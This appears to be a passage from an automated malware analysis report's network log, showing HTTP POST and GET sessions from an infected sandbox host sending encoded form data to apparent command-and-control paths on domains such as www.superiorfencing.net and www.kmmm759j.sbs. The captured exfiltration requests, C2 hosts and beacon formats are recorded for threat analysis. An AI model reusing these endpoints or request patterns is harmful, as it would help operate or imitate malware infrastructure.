                                                                                                  Data Ascii: OEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkH
                                                                                                  Dec 3, 2024 09:52:56.648659945 CET1289INData Raw: 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c
                                                                                                  Data Ascii: 0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjw
                                                                                                  Dec 3, 2024 09:52:56.648778915 CET1289INData Raw: 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52 44 66 5a 6a 50 69 2f 6e 50
                                                                                                  Data Ascii: Dip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2//iUPDsc41
                                                                                                  Dec 3, 2024 09:52:56.648808002 CET1289INData Raw: 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78 47 59 39 70 32 42 4e 46 66
                                                                                                  Data Ascii: rS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+PrFkk8CAAqj
                                                                                                  Dec 3, 2024 09:52:56.648833990 CET1289INData Raw: 4f 4f 36 4e 64 41 4a 41 59 36 37 54 75 6a 47 45 59 5a 75 37 36 43 4f 7a 42 4c 69 4f 56 52 6f 50 4b 39 53 76 34 65 76 30 35 64 65 47 49 4d 70 75 58 62 37 6b 64 2f 6c 36 64 59 48 2f 39 39 36 71 53 65 2f 2f 64 47 47 4c 31 46 51 31 47 2f 58 51 41 73
                                                                                                  Data Ascii: OO6NdAJAY67TujGEYZu76COzBLiOVRoPK9Sv4ev05deGIMpuXb7kd/l6dYH/996qSe//dGGL1FQ1G/XQAsZAVQexW+mEAVDy3t7SPrsXIgYvn08gFy+Cr+x5cgaIbHI3AFcseaGgr5IroALCQLY6zWbrOFsVyWDz4WMhPdADwP3X/2i833l9+IDE7bVB+OwZAxfHtG5WucnT+yR3tDide6x2g0fUnIru6Qw/ahrxlbTQY9V8ajH
                                                                                                  Dec 3, 2024 09:52:56.648859024 CET1289INData Raw: 59 2b 50 68 74 30 41 55 59 4c 36 54 56 71 57 45 6c 2b 59 49 43 4b 6d 48 37 36 55 6b 77 45 2b 72 4a 4a 7a 68 42 6f 42 2f 54 4d 43 75 77 61 69 76 61 6a 44 71 76 77 65 77 46 6e 4b 67 70 32 49 45 6e 74 76 59 73 6b 4b 70 6b 41 2f 37 7a 56 73 62 76 4f
                                                                                                  Data Ascii: Y+Pht0AUYL6TVqWEl+YICKmH76UkwE+rJJzhBoB/TMCuwaivajDqvwewFnKgp2IEntvYskKpkA/7zVsbvOXYz9BpFoGoVBHmV1CZex6bct8Bj4kFzkWzRXHFfk1cJeD3HfJpkBOAHIt58sYLS9871j/2BQZ2uagLeeKa1wkqe2rGse0fj10/84MAta4bOR6/0hFExry0HyWaUG6lS83hIoAD9uwsovjcuaFjfGCxxICAvAV4skp
                                                                                                  Dec 3, 2024 09:52:56.648897886 CET1289INData Raw: 55 4f 32 31 57 79 7a 58 4e 57 66 48 53 4f 71 34 36 76 53 37 47 6d 34 72 4d 50 43 73 66 31 6d 52 76 69 71 4e 43 30 34 49 73 56 50 79 44 7a 71 51 56 61 47 2b 4e 52 67 31 50 38 64 46 58 67 33 32 54 4d 51 4a 61 6e 69 48 79 6c 72 57 69 45 70 39 54 64
                                                                                                  Data Ascii: UO21WyzXNWfHSOq46vS7Gm4rMPCsf1mRviqNC04IsVPyDzqQVaG+NRg1P8dFXg32TMQJaniHylrWiEp9TdvP68UjoPu6RJ+ExHefACInrNzeQ6A9a7p6hMAw0YoKJKah4kBBySJyQvMtao0BKAk/m8Tm777sQfuGoz6QZDz/hxKKiaiiyW8dO3Gt5nZi0YMHAl/773guFD7VwIgfMM+jZ1CH4R+BTlBujC2AyhyDdtRXF01ZwuK


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  86192.168.11.3049953103.230.159.8680
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:53:01.985338926 CET693OUTPOST /5ltk/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.superiorfencing.net
                                                                                                  Referer: http://www.superiorfencing.net/5ltk/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 48 71 53 67 55 59 64 5a 57 44 72 4d 6c 48 65 4d 35 4a 76 6e 6e 71 32 48 50 7a 34 2b 2b 33 49 70 74 56 55 50 79 70 76 39 56 36 4b 48 67 42 76 71 6b 6a 67 52 58 33 4c 76 74 4a 52 42 61 55 4b 53 6d 66 45 33 6c 34 5a 51 4f 57 39 6a 6d 2b 79 43 4d 73 71 66 49 67 72 50 51 35 42 75 63 66 54 38 2b 52 4e 71 42 44 6f 4e 6b 51 67 65 4c 61 76 4b 63 6d 43 7a 47 49 4e 41 36 31 77 35 4f 72 59 55 6b 78 34 56 6d 2f 47 7a 37 62 74 37 75 6f 45 50 43 77 6d 67 61 4f 4c 33 46 37 38 33 79 69 51 72 58 6a 59 76 78 4c 6e 6d 76 73 79 36 55 61 33 68 74 30 79 55 2b 4b 65 57 61 4f 35 4f 59 55 63 32 67 3d 3d
                                                                                                  Data Ascii: 6aonl5x=oHqSgUYdZWDrMlHeM5Jvnnq2HPz4++3IptVUPypv9V6KHgBvqkjgRX3LvtJRBaUKSmfE3l4ZQOW9jm+yCMsqfIgrPQ5BucfT8+RNqBDoNkQgeLavKcmCzGINA61w5OrYUkx4Vm/Gz7bt7uoEPCwmgaOL3F783yiQrXjYvxLnmvsy6Ua3ht0yU+KeWaO5OYUc2g==
                                                                                                  Dec 3, 2024 09:53:02.297339916 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:53:02 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  87192.168.11.3049954103.230.159.8680
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:53:04.835143089 CET713OUTPOST /5ltk/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.superiorfencing.net
                                                                                                  Referer: http://www.superiorfencing.net/5ltk/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 48 71 53 67 55 59 64 5a 57 44 72 4f 42 44 65 41 36 68 76 32 58 71 78 43 50 7a 34 73 2b 33 4d 70 74 70 55 50 7a 64 42 36 6a 53 4b 47 45 52 76 70 6c 6a 67 53 58 33 4c 6c 4e 49 62 4d 36 55 33 53 6d 53 35 33 67 59 5a 51 4f 79 39 6a 6b 6d 79 43 64 73 6c 65 59 67 70 57 67 35 44 68 38 66 54 38 2b 52 4e 71 43 2f 4f 4e 6b 59 67 65 61 71 76 49 2b 65 46 36 6d 49 4f 55 71 31 77 75 65 71 52 55 6b 77 43 56 69 2b 52 7a 35 54 74 37 71 34 45 50 54 77 6c 35 71 4f 4e 70 31 36 64 34 54 50 75 6a 6b 66 31 6a 51 62 2b 6d 61 67 57 79 6a 33 74 38 75 41 77 48 65 32 7a 4b 62 6a 52 4d 61 56 48 72 69 70 73 55 2f 5a 33 79 72 72 31 38 6b 4a 6b 54 55 39 6c 6c 74 4d 3d
                                                                                                  Data Ascii: 6aonl5x=oHqSgUYdZWDrOBDeA6hv2XqxCPz4s+3MptpUPzdB6jSKGERvpljgSX3LlNIbM6U3SmS53gYZQOy9jkmyCdsleYgpWg5Dh8fT8+RNqC/ONkYgeaqvI+eF6mIOUq1wueqRUkwCVi+Rz5Tt7q4EPTwl5qONp16d4TPujkf1jQb+magWyj3t8uAwHe2zKbjRMaVHripsU/Z3yrr18kJkTU9lltM=
                                                                                                  Dec 3, 2024 09:53:05.154117107 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:53:04 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  88192.168.11.3049955103.230.159.8680
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:53:07.677383900 CET2578OUTPOST /5ltk/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.superiorfencing.net
                                                                                                  Referer: http://www.superiorfencing.net/5ltk/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 48 71 53 67 55 59 64 5a 57 44 72 4f 42 44 65 41 36 68 76 32 58 71 78 43 50 7a 34 73 2b 33 4d 70 74 70 55 50 7a 64 42 36 6a 61 4b 47 32 5a 76 7a 43 66 67 54 58 33 4c 70 74 49 59 4d 36 55 6d 53 6d 4b 39 33 67 55 6a 51 4d 36 39 78 78 36 79 57 2f 55 6c 55 59 67 70 4c 51 35 43 75 63 66 47 38 2b 42 7a 71 43 76 4f 4e 6b 59 67 65 5a 79 76 50 73 6d 46 34 6d 49 4e 41 36 31 38 35 4f 72 30 55 6e 41 34 56 69 72 73 7a 37 44 74 36 63 67 45 50 68 59 6c 35 71 4f 4e 39 6c 36 63 34 54 44 76 6a 6b 47 73 6a 52 44 75 6d 75 51 57 33 69 57 71 6a 50 77 31 63 66 57 66 4c 36 48 75 43 34 46 55 6b 68 78 37 61 76 5a 36 39 4a 4f 64 36 43 4e 2b 47 58 6c 50 77 5a 74 4b 69 41 4a 46 4b 65 4d 37 74 37 54 49 4c 52 78 31 42 4e 6c 66 35 4f 46 38 31 48 30 52 41 74 35 54 2b 73 64 6d 4b 47 39 76 44 30 32 47 42 41 6c 5a 61 72 4d 45 48 46 6c 74 30 67 4d 4d 65 53 7a 76 4e 4f 78 6d 41 48 34 69 55 58 49 79 38 4e 4c 68 63 33 34 70 38 34 4e 56 66 76 75 42 6c 72 62 2f 4a 54 33 46 5a 44 76 6b 48 4a 78 72 39 74 52 55 51 5a [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=oHqSgUYdZWDrOBDeA6hv2XqxCPz4s+3MptpUPzdB6jaKG2ZvzCfgTX3LptIYM6UmSmK93gUjQM69xx6yW/UlUYgpLQ5CucfG8+BzqCvONkYgeZyvPsmF4mINA6185Or0UnA4Virsz7Dt6cgEPhYl5qON9l6c4TDvjkGsjRDumuQW3iWqjPw1cfWfL6HuC4FUkhx7avZ69JOd6CN+GXlPwZtKiAJFKeM7t7TILRx1BNlf5OF81H0RAt5T+sdmKG9vD02GBAlZarMEHFlt0gMMeSzvNOxmAH4iUXIy8NLhc34p84NVfvuBlrb/JT3FZDvkHJxr9tRUQZkIFOISqf1g7BJzsw9HANvKlY0j5apqyAlO2jkY5HUscuXGmHgohCBiT1RA/bqA7vz3zuJQptf/w2jiVp9qm7x9TlctA1np9Q5ocN/CnRKr7PAa+wLgmfrtYj5bm3n+RuLyKIz6RxyAh8CSQWViMtS9zDhhVOkPcT1vtnsdRBHrieqb6cGCFlV+vtKQCk0cXKOvnpVRPRq/PtVoj6L25xV8qSKVNdZCKKph1dwT5xc7N62d9rgFKmhXDqJq1yc6LMk3IP1d+YM4oKuLJFOJX0yx1uVWM2hNxf9dCVNBh1d1Ae32aRR8QoGTXCsxeS47umDfYmWwqn63Rxfgo/4M0HSK4j6ygnYrAO8nz6VrKlKYyFJb5VkTQIk3uTYjsGAQU+M0+NXME+HiTBMSO6vE+QkeWzepMPK8dyRMI+aSP7TfxtOqI4hEhKCIvvzqmJ0gkbqqF/HW9nrtT9jhixEk6SUVaH204URHsfjnaaG0epJl0KOMx5/S3uUEI2gG2Z9xOQ1iPp9OggciR2mJ+5ax8pIRE0HVxkt9SLvH/fRlB15WevcLLK/fHCAfr3bVsba/Vaz++k2i79BghcSgi9uh3HYtlaM0BlqiSDgSX8Wj1mU1q5vGAuTlCcB6p1gueVBboL08OM9rPsQ+5NW+2knQEpNIz34WCaOo4EHs [TRUNCATED]
                                                                                                  Dec 3, 2024 09:53:07.677459955 CET1252OUTData Raw: 2f 58 34 4c 66 38 51 6e 75 52 47 6f 73 50 50 31 55 30 64 2b 49 6e 79 67 33 79 7a 53 55 74 4e 43 55 67 6a 6e 76 53 4a 46 7a 6d 41 4a 32 6a 53 52 6f 6c 6b 59 6b 47 77 32 44 2b 34 55 4b 71 4d 4c 43 6d 6b 74 72 47 35 74 44 30 4e 6f 38 64 68 6e 58 65
                                                                                                  Data Ascii: /X4Lf8QnuRGosPP1U0d+Inyg3yzSUtNCUgjnvSJFzmAJ2jSRolkYkGw2D+4UKqMLCmktrG5tD0No8dhnXeMKFbgtXMsrWCd8iP748d4JGC4s3ByYxoBKNLzSj5qxi0vYfFt5beVYAYEvQFWY07NLdcV90qyYbDibCn7JfsFTHK1JzaaZ6qXdnOkCJAMN8EghbET/UiynWjVFpDy8epUnp//sb0vUlekcW6JN8jGG3HNm8gE65YI
                                                                                                  Dec 3, 2024 09:53:07.995491982 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:53:07 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  89192.168.11.3049956103.230.159.8680
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:53:10.513726950 CET420OUTGET /5ltk/?6aonl5x=lFCyjgUgRWTJD3PvHrx0okuLDoXTkt/loKBcMldX7EHyWmdK0Vf5T1rkkoFAHq8jWgOppi08ScKStlrsdMkFXoBVPkBmvOuk6JZ8uBPhbCVyIuKgJdug7RU=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:53:10.826478004 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:53:10 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  90192.168.11.304995743.156.176.25380
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:53:16.182495117 CET672OUTPOST /vz2d/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.kmmm759j.sbs
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.kmmm759j.sbs
                                                                                                  Referer: http://www.kmmm759j.sbs/vz2d/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 38 6c 47 67 7a 66 39 54 77 6c 38 77 75 57 33 57 64 64 2f 39 6a 76 62 4c 43 6f 44 6d 75 42 48 50 35 30 42 4c 6a 66 42 52 72 45 46 49 73 7a 2f 4d 57 32 51 4b 56 6a 4e 31 57 41 6e 72 79 76 63 73 6d 6d 6f 31 47 44 43 6f 59 68 44 76 37 4b 64 6a 39 73 41 4d 30 43 37 2b 7a 6a 66 6d 63 2b 37 59 66 46 61 5a 47 79 4e 55 66 65 69 4a 6f 30 77 41 59 67 45 4d 37 44 47 69 62 31 72 44 72 54 33 49 69 76 31 36 31 68 77 4d 53 70 38 30 52 4b 4a 57 44 50 56 44 59 4f 42 52 48 46 36 37 4b 61 37 70 36 34 5a 6a 66 49 6c 45 50 44 6e 33 43 5a 71 4a 66 56 69 2f 49 32 6c 6c 42 74 45 5a 6e 78 49 72 45 67 3d 3d
                                                                                                  Data Ascii: 6aonl5x=8lGgzf9Twl8wuW3Wdd/9jvbLCoDmuBHP50BLjfBRrEFIsz/MW2QKVjN1WAnryvcsmmo1GDCoYhDv7Kdj9sAM0C7+zjfmc+7YfFaZGyNUfeiJo0wAYgEM7DGib1rDrT3Iiv161hwMSp80RKJWDPVDYOBRHF67Ka7p64ZjfIlEPDn3CZqJfVi/I2llBtEZnxIrEg==
                                                                                                  Dec 3, 2024 09:53:16.523864985 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:53:16 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58296
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67403337-e3b8"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
